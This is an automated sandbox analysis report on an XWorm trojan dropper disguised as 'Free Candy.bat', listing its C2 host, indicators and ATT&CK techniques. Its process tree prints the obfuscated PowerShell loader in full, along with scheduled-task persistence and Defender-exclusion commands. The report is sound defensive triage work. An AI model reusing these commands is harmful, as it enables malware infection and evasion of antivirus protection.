xworm | e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

Analysis

max time kernel
316s
max time network
1050s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06/08/2024, 04:05

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Free Candy.bat
Size

726KB
MD5

5f14117f1fd87fa46fb37b56e87f0e7f
SHA1

50a2950aaad34258933cf10f78195b61f870ee7d
SHA256

e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae
SHA512

1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0
SSDEEP

12288:jRqwpZL+rpkFQN7X/oWnNVnh9E8pW9IGsHmcTAl79RCMzTindB:jRL6lpvoWL/EF9IYcTiSWcB

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

hard-tyler.gl.at.ply.gg:27490

Attributes

Install_directory
%Temp%
install_file
systemprocess.exe

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral2/memory/2956-29-0x00000233EEA30000-0x00000233EEAD6000-memory.dmp	family_xworm
behavioral2/memory/1932-114-0x000001D44C5A0000-0x000001D44C5F0000-memory.dmp	family_xworm
behavioral2/files/0x000900000001ac3b-123.dat	family_xworm
behavioral2/memory/3232-125-0x0000000000600000-0x000000000064E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1932	powershell.exe
9	1932	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2956	powershell.exe
368	powershell.exe
1932	powershell.exe
2088	powershell.exe
2896	powershell.exe
4952	powershell.exe
1516	powershell.exe
2656	powershell.exe
4244	powershell.exe
776	powershell.exe
4184	powershell.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3232	XClient.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"	XClient.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
2956	powershell.exe
2956	powershell.exe
2956	powershell.exe
368	powershell.exe
368	powershell.exe
368	powershell.exe
1932	powershell.exe
1932	powershell.exe
1932	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
4244	powershell.exe
4244	powershell.exe
4244	powershell.exe
776	powershell.exe
776	powershell.exe
776	powershell.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
2088	powershell.exe
2088	powershell.exe
2088	powershell.exe
2896	powershell.exe
2896	powershell.exe
2896	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
1516	powershell.exe
1516	powershell.exe
1516	powershell.exe
1932	powershell.exe
3232	XClient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeIncreaseQuotaPrivilege	368	powershell.exe
Token: SeSecurityPrivilege	368	powershell.exe
Token: SeTakeOwnershipPrivilege	368	powershell.exe
Token: SeLoadDriverPrivilege	368	powershell.exe
Token: SeSystemProfilePrivilege	368	powershell.exe
Token: SeSystemtimePrivilege	368	powershell.exe
Token: SeProfSingleProcessPrivilege	368	powershell.exe
Token: SeIncBasePriorityPrivilege	368	powershell.exe
Token: SeCreatePagefilePrivilege	368	powershell.exe
Token: SeBackupPrivilege	368	powershell.exe
Token: SeRestorePrivilege	368	powershell.exe
Token: SeShutdownPrivilege	368	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeSystemEnvironmentPrivilege	368	powershell.exe
Token: SeRemoteShutdownPrivilege	368	powershell.exe
Token: SeUndockPrivilege	368	powershell.exe
Token: SeManageVolumePrivilege	368	powershell.exe
Token: 33	368	powershell.exe
Token: 34	368	powershell.exe
Token: 35	368	powershell.exe
Token: 36	368	powershell.exe
Token: SeIncreaseQuotaPrivilege	368	powershell.exe
Token: SeSecurityPrivilege	368	powershell.exe
Token: SeTakeOwnershipPrivilege	368	powershell.exe
Token: SeLoadDriverPrivilege	368	powershell.exe
Token: SeSystemProfilePrivilege	368	powershell.exe
Token: SeSystemtimePrivilege	368	powershell.exe
Token: SeProfSingleProcessPrivilege	368	powershell.exe
Token: SeIncBasePriorityPrivilege	368	powershell.exe
Token: SeCreatePagefilePrivilege	368	powershell.exe
Token: SeBackupPrivilege	368	powershell.exe
Token: SeRestorePrivilege	368	powershell.exe
Token: SeShutdownPrivilege	368	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeSystemEnvironmentPrivilege	368	powershell.exe
Token: SeRemoteShutdownPrivilege	368	powershell.exe
Token: SeUndockPrivilege	368	powershell.exe
Token: SeManageVolumePrivilege	368	powershell.exe
Token: 33	368	powershell.exe
Token: 34	368	powershell.exe
Token: 35	368	powershell.exe
Token: 36	368	powershell.exe
Token: SeIncreaseQuotaPrivilege	368	powershell.exe
Token: SeSecurityPrivilege	368	powershell.exe
Token: SeTakeOwnershipPrivilege	368	powershell.exe
Token: SeLoadDriverPrivilege	368	powershell.exe
Token: SeSystemProfilePrivilege	368	powershell.exe
Token: SeSystemtimePrivilege	368	powershell.exe
Token: SeProfSingleProcessPrivilege	368	powershell.exe
Token: SeIncBasePriorityPrivilege	368	powershell.exe
Token: SeCreatePagefilePrivilege	368	powershell.exe
Token: SeBackupPrivilege	368	powershell.exe
Token: SeRestorePrivilege	368	powershell.exe
Token: SeShutdownPrivilege	368	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeSystemEnvironmentPrivilege	368	powershell.exe
Token: SeRemoteShutdownPrivilege	368	powershell.exe
Token: SeUndockPrivilege	368	powershell.exe
Token: SeManageVolumePrivilege	368	powershell.exe
Token: 33	368	powershell.exe
Token: 34	368	powershell.exe
Token: 35	368	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1932	powershell.exe
3232	XClient.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4240 wrote to memory of 2956	4240	cmd.exe	73
PID 4240 wrote to memory of 2956	4240	cmd.exe	73
PID 2956 wrote to memory of 368	2956	powershell.exe	74
PID 2956 wrote to memory of 368	2956	powershell.exe	74
PID 2956 wrote to memory of 1100	2956	powershell.exe	77
PID 2956 wrote to memory of 1100	2956	powershell.exe	77
PID 1100 wrote to memory of 4296	1100	WScript.exe	78
PID 1100 wrote to memory of 4296	1100	WScript.exe	78
PID 4296 wrote to memory of 1932	4296	cmd.exe	80
PID 4296 wrote to memory of 1932	4296	cmd.exe	80
PID 1932 wrote to memory of 3232	1932	powershell.exe	81
PID 1932 wrote to memory of 3232	1932	powershell.exe	81
PID 1932 wrote to memory of 2656	1932	powershell.exe	82
PID 1932 wrote to memory of 2656	1932	powershell.exe	82
PID 3232 wrote to memory of 4244	3232	XClient.exe	84
PID 3232 wrote to memory of 4244	3232	XClient.exe	84
PID 1932 wrote to memory of 776	1932	powershell.exe	87
PID 1932 wrote to memory of 776	1932	powershell.exe	87
PID 3232 wrote to memory of 4184	3232	XClient.exe	89
PID 3232 wrote to memory of 4184	3232	XClient.exe	89
PID 1932 wrote to memory of 2088	1932	powershell.exe	91
PID 1932 wrote to memory of 2088	1932	powershell.exe	91
PID 3232 wrote to memory of 2896	3232	XClient.exe	93
PID 3232 wrote to memory of 2896	3232	XClient.exe	93
PID 1932 wrote to memory of 4952	1932	powershell.exe	95
PID 1932 wrote to memory of 4952	1932	powershell.exe	95
PID 3232 wrote to memory of 1516	3232	XClient.exe	97
PID 3232 wrote to memory of 1516	3232	XClient.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Free Candy.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Free Candy.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Free Candy.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_486_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_486.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:368
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_486.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_486.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_486.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_486.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1932
      - C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1516
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2656
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:776
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7322f8982b99625fe93a8fc5b7a9c207

SHA1
3fdf5fc612042d0775fcb02b29abf4b643c700cf

SHA256
87293555fccc4e9eff83637b1355bc382caacb88214a462a49f0bb2198c9a027

SHA512
df1d4bc314351a3d24f81354fba44f0044428171c97ca5e3206c3fbcd15c8ea53340559c713f33520199d49290a03804122e88f78ba956601d87a68b2a25bfd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6bf6f1381774e9a5fb50b4ff461acd2f

SHA1
4f0f8969c1ed6763c902706556ba5f2edb55c1fb

SHA256
f6a2d2d403e3263863be578410274191d6ceefd5f078ab5a3ff1760d0d32a5b2

SHA512
1f9bc916167fce8f83d3bf75fe51b4fe29b0b5eb812373d11f1bfe6d0a56ff635dd66a88a25df6b3e6c83fff43dadf04fa3a09c16ceed0ca68cfb170c352059e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
271caaf0bd0a4025bfa065060194c27d

SHA1
ad3276800ec24772cbd1f800a3ba142011d8d6de

SHA256
d4f0ca867164c7e4a310d87493ca4d3955c4b4613681727f277b3c7b0e9a1058

SHA512
0df809ebae9d4b4d6174eed0ef76d7d46a9a40433cb888f92f9dfc1eb396677b15ec7b0f1ec3eabc625c35052660fbe4d940628439e368e57b3840352b9ae45f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23a1d2842af60b4b19067fbe9cb767ac

SHA1
ce62748a375cfedc84f288459695a2f05a764228

SHA256
a26e0cea1a9d1312891e65b6e4b04b755debb62b72e379cdda7137eb893f6705

SHA512
b898016554bf1bb9b4af096134f60c25390c54c184c04d8129e15f2e56f07f2ee194055eb2dfa3ec51e67cbc41486cd4c1cfb123be4512c5ad4e6f4b280884c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2ce22617390a2d7e3e6158b4a00a6bfe

SHA1
3eee336da0ee190729893be64a9d7a323077162e

SHA256
858e5d5fcdc436725a43a5a279f7b292b205c7bcda262d4d497851b72881b3e7

SHA512
650e7c2de59e5596060378fede79e2e52d0982f2d17a1a68e1584a512ae083e082da32643c02d9bfec7264dc64fa11c5777151f37016cf9d210b876a57e09b17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
077f8ce6994d0bcb9e0a44a174aafe90

SHA1
517eaa5d45ec6ee0aa2f7a2979637259737e6b48

SHA256
88a11b94216d5a6e9f60bf266216a3b3bd45ceae9a815dda2c5b8cf7f96a17c9

SHA512
de8699327bc327aab0440ee41d01bae106aacbe4d7b701737330ea8ead5cd1918817c372acd9d2a9629414cf6d79b00715a7c0b00ad0be8baf83bdf4bbebee33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f8840883fd351d8974bf41834d1d05cd

SHA1
3da96fa370c2cd02ec880e99b25a48fc852e85e8

SHA256
4dbdb5f6330c5808a252f69bf09744d190e3e9515421780ba625707aada60fd2

SHA512
1cd345591cbfaa7a7279deb46b689b17828b71962418fecb882eb50f4d15fbbe9c9d38893f0858e6168e65879ae33baba81492de0fbfe9c9d2b6128e30b6cd99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7c063219527a7709eacae3b97197e0ff

SHA1
aec6bb765534427b6564f486fb62651076a36f80

SHA256
96dfc43d1b2be59f2ba61ec20ca12f9c17f57fe6c4e919883a10387f1065d571

SHA512
35580b9f2ee14c2f08762c3f1bf41ceafe1bb20498cc0b8fe74e9f7d6ff81e17f252810764d0ac85f4647b3995c5d5b93351c98bad4921e60c90877c7ea6bb8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
292KB

MD5
06aa0446d6ce7b7d44270ef4218793cf

SHA1
2ae7b6b80a4025c262aa6f38db7bd1ece676648d

SHA256
db7b93708805fbcf98f5fd0068b24becf4e1f11371ed2f6f58e3bafb9c272068

SHA512
49220519f8f773bd0c74e2eb8cec902071026741ecd88453d2c4dc5ee78175f67320c9cba0d81e9858f1180573df0068ab570a967af5d7076e803ad71d9a6971

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejrd3ybe.5pm.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk

Filesize
1KB

MD5
77c82bb0253e8178c6bb071fdb044460

SHA1
d631d03015d7dbfd20056351c8e034c0eea39a36

SHA256
ef83347531c4a3e0574542ce5c717df690666c518bf5d2e4eda5e29978d788e9

SHA512
ba6fdad9f948e5396198927eab33aa9325b01a438424b06d0dc22aa995f9b519f3c1f42561b0b1234877bdc00a9efb99db3e2674ea0c1c1f9e4142b98ad7bb63

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_486.bat

Filesize
726KB

MD5
5f14117f1fd87fa46fb37b56e87f0e7f

SHA1
50a2950aaad34258933cf10f78195b61f870ee7d

SHA256
e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

SHA512
1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_486.vbs

Filesize
115B

MD5
af1f80cef9fd6fd2e4ad2c02357b2587

SHA1
0a45e2b8906b2a553d40a7d3d64f59d44b413903

SHA256
eb83a117038f397ff5a43d323b690ca30b866e5bf0cac52577ef7bb52e02aa75

SHA512
1a743034f8a543249dd0c6d2842ee996bcab8080b222eae96af966ece89fd65dc26e4903722ee3da1f33ef0ae718466fb57b99e36daf6778957387723f7ae67b

Download Submit
memory/368-41-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/368-74-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/368-42-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/1932-114-0x000001D44C5A0000-0x000001D44C5F0000-memory.dmp

Filesize
320KB

Download
memory/2956-12-0x00000233EE9B0000-0x00000233EEA26000-memory.dmp

Filesize
472KB

Download
memory/2956-126-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-28-0x00000233EE9A0000-0x00000233EE9A8000-memory.dmp

Filesize
32KB

Download
memory/2956-6-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-3-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

Filesize
4KB

Download
memory/2956-9-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-29-0x00000233EEA30000-0x00000233EEAD6000-memory.dmp

Filesize
664KB

Download
memory/2956-5-0x00000233EE800000-0x00000233EE822000-memory.dmp

Filesize
136KB

Download
memory/3232-125-0x0000000000600000-0x000000000064E000-memory.dmp

Filesize
312KB

Download